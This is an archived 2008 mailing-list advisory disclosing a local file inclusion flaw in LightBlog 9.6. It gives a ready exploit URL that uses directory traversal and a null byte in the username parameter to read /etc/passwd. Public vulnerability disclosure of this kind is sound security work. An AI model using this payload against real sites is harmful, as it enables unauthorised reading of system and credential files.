OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
lightblog 9.6 local file inclusion vulnerability

From: muuratsalo experimental hack lab (muuratsalogmail.com)
Date: Sat Feb 16 2008 - 18:01:35 CST


lightblog 9.6 local file inclusion vulnerability

download http://www.publicwarehouse.co.uk/php_scripts/lightblog.php

author muuratsalo
contact muuratsalo[at]gmail.com

exploit
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00